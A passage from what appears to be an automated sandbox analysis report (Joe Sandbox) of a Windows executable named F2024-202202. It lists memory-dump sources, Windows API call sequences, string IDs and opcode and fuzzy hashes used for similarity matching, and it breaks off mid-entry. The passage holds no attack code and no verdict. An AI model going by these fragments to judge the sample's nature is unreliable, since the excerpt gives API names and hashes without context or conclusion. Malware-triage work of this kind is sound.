              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
              • String ID: SysAnimate32
              • API String ID: 4146253029-1011021900
              • Opcode ID: 4f3bda09725446add3ab46d9b42aa5240aa90f0388deb2e482df1f0e07b44a1e
              • Instruction ID: 35810085a786cf4944b2855cb37ac408f96d8dee6ab39cdd60669964222bfc42
              • Opcode Fuzzy Hash: 4f3bda09725446add3ab46d9b42aa5240aa90f0388deb2e482df1f0e07b44a1e
              • Instruction Fuzzy Hash: 1E218B71220306AFEF104F64EC88EAB77ADEB59368F104629F911921E2D7768C719B60
              APIs
              • GetStdHandle.KERNEL32(0000000C), ref: 001E705E
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E7091
              • GetStdHandle.KERNEL32(0000000C), ref: 001E70A3
              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001E70DD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateHandle$FilePipe
              • String ID: nul
              • API String ID: 4209266947-2873401336
              • Opcode ID: a42b29d77f5e81a92bf3da917a47950c103675fc6aea918456b1087cb59a0fec
              • Instruction ID: 2c5e8d31ac4e23a93d152631fd2cfe5a1e9ea693297a8eb350a8716874c63747
              • Opcode Fuzzy Hash: a42b29d77f5e81a92bf3da917a47950c103675fc6aea918456b1087cb59a0fec
              • Instruction Fuzzy Hash: 13218174504749ABEB209F3AEC09A9EB7B8AF56720F204A19FCA1D72D0D7B099508B50
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 001E712B
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001E715D
              • GetStdHandle.KERNEL32(000000F6), ref: 001E716E
              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001E71A8
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: CreateHandle$FilePipe
              • String ID: nul
              • API String ID: 4209266947-2873401336
              • Opcode ID: 5631892dac13882075b95d718624364f7870ad903f85103931cef59f69561196
              • Instruction ID: 5fa7e616ceb13e2f93511b48cb3ec2c772d196f4be67f5fe1b3f80eb2b456e73
              • Opcode Fuzzy Hash: 5631892dac13882075b95d718624364f7870ad903f85103931cef59f69561196
              • Instruction Fuzzy Hash: 8521C275644785ABEB209F6A9C04AAEB7E8AF55730F200A19FDF1D32D0D7709841CB60
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 001EAEBF
              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001EAF13
              • __swprintf.LIBCMT ref: 001EAF2C
              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0020F910), ref: 001EAF6A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorMode$InformationVolume__swprintf
              • String ID: %lu
              • API String ID: 3164766367-685833217
              • Opcode ID: 21ffc6b6178eb708c8e182f188e929f93b12ba5706a65b6d1902b725ce4e004d
              • Instruction ID: fd965f7f3da8e7813f9760f7bf18f46f9c12948d24608665bf38f4e6af5ed86a
              • Opcode Fuzzy Hash: 21ffc6b6178eb708c8e182f188e929f93b12ba5706a65b6d1902b725ce4e004d
              • Instruction Fuzzy Hash: 15218634A00209AFCB10EF65DD85DAE77B8EF89704B004069F909DB252DB71EA41CB61
              APIs
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
                • Part of subcall function 001DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001DA399
                • Part of subcall function 001DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 001DA3AC
                • Part of subcall function 001DA37C: GetCurrentThreadId.KERNEL32 ref: 001DA3B3
                • Part of subcall function 001DA37C: AttachThreadInput.USER32(00000000), ref: 001DA3BA
              • GetFocus.USER32 ref: 001DA554
                • Part of subcall function 001DA3C5: GetParent.USER32(?), ref: 001DA3D3
              • GetClassNameW.USER32(?,?,00000100), ref: 001DA59D
              • EnumChildWindows.USER32(?,001DA615), ref: 001DA5C5
              • __swprintf.LIBCMT ref: 001DA5DF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
              • String ID: %s%d
              • API String ID: 1941087503-1110647743
              • Opcode ID: 08b79949eea73fccce68dee2d9a2055d74b00eb4af5795a25d902ccd5088ea26
              • Instruction ID: 906ca72ed9aaa52c587922179c4c90753eed65877989049e48346af118ea4223
              • Opcode Fuzzy Hash: 08b79949eea73fccce68dee2d9a2055d74b00eb4af5795a25d902ccd5088ea26
              • Instruction Fuzzy Hash: A811B471640308BBDF20BFA4DC89FEA377DAF59710F044076B918AA293CB749A458B75
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 001E2048
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharUpper
              • String ID: APPEND$EXISTS$KEYS$REMOVE
              • API String ID: 3964851224-769500911
              • Opcode ID: 7b36f3361404f061ce511132c68098c0fb7e3821803c5c78d43bbc07aa6bbeaa
              • Instruction ID: 061151707861d4363a5de30d0c889da908affdb336e0a10df22ebe52949ff21c
              • Opcode Fuzzy Hash: 7b36f3361404f061ce511132c68098c0fb7e3821803c5c78d43bbc07aa6bbeaa
              • Instruction Fuzzy Hash: B6118475910109CFCF00EFA4D9914FEB7B4FF6A304F148469E89567292DB325D16CB50
              APIs
              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001FEF1B
              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001FEF4B
              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 001FF07E
              • CloseHandle.KERNEL32(?), ref: 001FF0FF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Process$CloseCountersHandleInfoMemoryOpen
              • String ID:
              • API String ID: 2364364464-0
              • Opcode ID: 41963c7884690fc12dd40f3e9a6735e4ca32911d3ef20ef0c31678e3536280ec
              • Instruction ID: d50dbc701df55baede7ddc5007442b350a78f618fceb3506a3ee41cf7a942467
              • Opcode Fuzzy Hash: 41963c7884690fc12dd40f3e9a6735e4ca32911d3ef20ef0c31678e3536280ec
              • Instruction Fuzzy Hash: D18183716043119FD724EF24C886F3AB7E5AF58720F04885DF69ADB292DBB0AD018F51
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 002010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200388
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002003C7
              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0020040E
              • RegCloseKey.ADVAPI32(?,?), ref: 0020043A
              • RegCloseKey.ADVAPI32(00000000), ref: 00200447
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
              • String ID:
              • API String ID: 3440857362-0
              • Opcode ID: 80910ee5f2b2cc53ab70bca2bbd88bce70fbe4377be73717a906bb86ea475430
              • Instruction ID: c0e59ddb947f1b8ae62a2887c20cce518c7be4a32b4d00842e107add075aea42
              • Opcode Fuzzy Hash: 80910ee5f2b2cc53ab70bca2bbd88bce70fbe4377be73717a906bb86ea475430
              • Instruction Fuzzy Hash: D6514431218305AFD714EF64D885F6EB7E9FF88704F04896EB595872A2DB30EA14CB52
              APIs
              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001EE88A
              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 001EE8B3
              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001EE8F2
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001EE917
              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001EE91F
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
              • String ID:
              • API String ID: 1389676194-0
              • Opcode ID: 053b8c3fadf223d8917fc01bd976a680862db75421959e5978b7ef7739f10a7e
              • Instruction ID: e76e59c096d63d3c70a122951fc193542e0227d2fbdf090ae3b6a51f79eee8a3
              • Opcode Fuzzy Hash: 053b8c3fadf223d8917fc01bd976a680862db75421959e5978b7ef7739f10a7e
              • Instruction Fuzzy Hash: 26513B35A00205EFCF15EF65C9819AEBBF5EF19314B188099E849AB362CB31EE11CF50
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 72906bf33817fd6dfa6bf5ed1cb8c45d7607a704cc36e6b2cee098683c1571cb
              • Instruction ID: 67970f071b8400569b3a2c644e065926a976f04cc835a0514b1f9a8def14ac6b
              • Opcode Fuzzy Hash: 72906bf33817fd6dfa6bf5ed1cb8c45d7607a704cc36e6b2cee098683c1571cb
              • Instruction Fuzzy Hash: 4D411735920305AFC720DF28DC48FA9BBA8FB09310F9541A5F855A72E3D770AD61DB52
              APIs
              • GetCursorPos.USER32(?), ref: 00182357
              • ScreenToClient.USER32(002467B0,?), ref: 00182374
              • GetAsyncKeyState.USER32(00000001), ref: 00182399
              • GetAsyncKeyState.USER32(00000002), ref: 001823A7
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AsyncState$ClientCursorScreen
              • String ID:
              • API String ID: 4210589936-0
              • Opcode ID: da0f99cf8bcd1cd035f1b0f0b413a333f4c9fca9ae92dac0e2df81090c79c40d
              • Instruction ID: 86ccd4e131f3be9d0291a87268c3c9945e2ba88a4fd0827c9a1df2976cb1213b
              • Opcode Fuzzy Hash: da0f99cf8bcd1cd035f1b0f0b413a333f4c9fca9ae92dac0e2df81090c79c40d
              • Instruction Fuzzy Hash: A641A275604219FBDF1A9F68C848AEEBB74FF09320F20435AF829A2290C7345A50DFD1
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001D695D
              • TranslateAcceleratorW.USER32(?,?,?), ref: 001D69A9
              • TranslateMessage.USER32(?), ref: 001D69D2
              • DispatchMessageW.USER32(?), ref: 001D69DC
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001D69EB
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Message$PeekTranslate$AcceleratorDispatch
              • String ID:
              • API String ID: 2108273632-0
              • Opcode ID: 9d5f00f93b6e9af5bc30c2d83a6e2c35689565f84c3526f798e1001984f6148d
              • Instruction ID: 99d9de636f2072c1e51bb58a6623e303cb828e28002fee6a293da7e8df83cb6d
              • Opcode Fuzzy Hash: 9d5f00f93b6e9af5bc30c2d83a6e2c35689565f84c3526f798e1001984f6148d
              • Instruction Fuzzy Hash: 3631F471900206AEDB68CF74EC8CFB6BBACAB13308F104167E421D32A1E775D889D791
              APIs
              • GetWindowRect.USER32(?,?), ref: 001D8F12
              • PostMessageW.USER32(?,00000201,00000001), ref: 001D8FBC
              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 001D8FC4
              • PostMessageW.USER32(?,00000202,00000000), ref: 001D8FD2
              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 001D8FDA
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessagePostSleep$RectWindow
              • String ID:
              • API String ID: 3382505437-0
              • Opcode ID: 854ecf1ee788aa49aedd4a8eaa97e6a6543798b58f78d7609fef46544f72fcbc
              • Instruction ID: 9ecb73aaa83096ae1410bd52d84c522dd63c8c96bc9c4a1e4d2d3f7dc2b6d512
              • Opcode Fuzzy Hash: 854ecf1ee788aa49aedd4a8eaa97e6a6543798b58f78d7609fef46544f72fcbc
              • Instruction Fuzzy Hash: 6331CE71500219EFDF14CF68EE4CAAE7BBAEB04315F10422AF925EA2D1C7B09914DB90
              APIs
              • IsWindowVisible.USER32(?), ref: 001DB6C7
              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 001DB6E4
              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 001DB71C
              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 001DB742
              • _wcsstr.LIBCMT ref: 001DB74C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
              • String ID:
              • API String ID: 3902887630-0
              • Opcode ID: 27397f894b8d9c74c6398109993579f3afc03b25848ddbfc89231a636ca2835b
              • Instruction ID: 1a73845036262274713ca861a848d2024ed706b899aa8ac687d9edec66f61702
              • Opcode Fuzzy Hash: 27397f894b8d9c74c6398109993579f3afc03b25848ddbfc89231a636ca2835b
              • Instruction Fuzzy Hash: 7C21FC35248204FBEB255B399D89E7B7B9CDF49750F11403EFC06CA2A1EF61DC419660
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • GetWindowLongW.USER32(?,000000F0), ref: 0020B44C
              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0020B471
              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0020B489
              • GetSystemMetrics.USER32(00000004), ref: 0020B4B2
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,001F1184,00000000), ref: 0020B4D0
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Long$MetricsSystem
              • String ID:
              • API String ID: 2294984445-0
              • Opcode ID: 68057b53db213eb125fc5ff5ddba3af62f8e10462732b31b921889be62b6f42e
              • Instruction ID: 31cf86a3979ac4da4372b7077ab80e183428ff1bfe7322443b34bad2282e861b
              • Opcode Fuzzy Hash: 68057b53db213eb125fc5ff5ddba3af62f8e10462732b31b921889be62b6f42e
              • Instruction Fuzzy Hash: 53219471920316AFCB319F389C58A693BA4FB05721F114734F925D25E3E7309A20DB50
              APIs
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D9802
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D9834
              • __itow.LIBCMT ref: 001D984C
              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001D9874
              • __itow.LIBCMT ref: 001D9885
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$__itow$_memmove
              • String ID:
              • API String ID: 2983881199-0
              • Opcode ID: 1f370e6e65f349d8c50ba02a8fce39126564ccf3994da4a89db999c5a93ef3db
              • Instruction ID: 56ffe70f9e3c73ff0c7c08a3e5085c889916d785e821b58b07d0c3564bb5faab
              • Opcode Fuzzy Hash: 1f370e6e65f349d8c50ba02a8fce39126564ccf3994da4a89db999c5a93ef3db
              • Instruction Fuzzy Hash: C221FB31B00308ABDB10AAA18C8AEAE7BACEF5AB24F040025F905D7381D770CD419BD1
              APIs
              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0018134D
              • SelectObject.GDI32(?,00000000), ref: 0018135C
              • BeginPath.GDI32(?), ref: 00181373
              • SelectObject.GDI32(?,00000000), ref: 0018139C
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 7637e8cdbf6174440238ec858b22c2f5f99059a000af2ca7835b0b67bd597cd5
              • Instruction ID: 99e31774ed64176afd6e246b5c348f6d574fc0f8e58344b9221665b082147e47
              • Opcode Fuzzy Hash: 7637e8cdbf6174440238ec858b22c2f5f99059a000af2ca7835b0b67bd597cd5
              • Instruction Fuzzy Hash: C621B276800708EFDB109F24FC0C7693BB9FB02722F104225F804925A0D3718996CF91
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 3faf226f32230581ff1f45ab27f39d66dbcb2c8e5a64ff57c059cbeb4e2dad81
              • Instruction ID: 3c6b4ffbda6981c80e16593342ec9351bb0456924227aab0d71f84d18173bbe5
              • Opcode Fuzzy Hash: 3faf226f32230581ff1f45ab27f39d66dbcb2c8e5a64ff57c059cbeb4e2dad81
              • Instruction Fuzzy Hash: 300192B1A04227FBE204A6249C42FBB639C9F32394F054522FD08D6383E7A49E25C2E0
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 001E4D5C
              • __beginthreadex.LIBCMT ref: 001E4D7A
              • MessageBoxW.USER32(?,?,?,?), ref: 001E4D8F
              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001E4DA5
              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001E4DAC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
